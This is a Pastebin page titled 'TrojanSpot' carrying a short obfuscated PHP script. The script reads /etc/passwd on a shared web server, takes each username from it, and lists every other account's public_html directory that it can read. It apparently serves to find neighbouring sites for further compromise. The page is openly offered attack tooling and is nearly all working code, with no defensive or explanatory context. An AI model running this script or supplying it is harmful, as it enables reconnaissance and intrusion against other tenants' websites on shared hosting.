TrojanSpot

User Read | www.pemula.info

Sep 24th, 2012
150
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.82 KB | None | 0 0
  1. ?»?<?php
  2.  
  3. set_time_limit(0);
  4.  
  5. ($x0b = ini_get('safe_mode') == 0) ? $x0b = 'off': die('<b>ERROR SAFE MODE : On</b>');
  6.  
  7. @$x0c = fopen('/etc/passwd','r');
  8.  
  9. if (!$x0c) { die('<b> Error gk ada /etc/passwd </b>'); }
  10.  
  11. // $x0d = array();
  12. // $x0e = array();
  13. // $x0f = array();
  14. // $x10 = 0;
  15.  
  16. while(!feof($x0c)){
  17.     // baca baris...
  18.     // $x11 = fgets($x0c);
  19.     // if ($x10 < 35){
  20.     while($x11 = fgets($x0c)){
  21.        
  22.         $x12 = strpos($x11,':');
  23.  
  24.         $x13 = substr($x11,0,$x12);
  25.  
  26.  
  27.         $x14 = '/home/'.$x13.'/public_html';
  28.         if (($x13 != '')){
  29.            
  30.             if (is_readable($x14)){
  31.  
  32.                 echo "<font face=Verdana size=5 color=#c000ff>[&#8224;] WeW [&#8224;] $x14</font>";
  33.                 echo "<br/>";
  34.             }    
  35.         }
  36.     }
  37.     // $x10++;
  38. }
  39.  
  40. ?>
Add Comment
Please, Sign In to add comment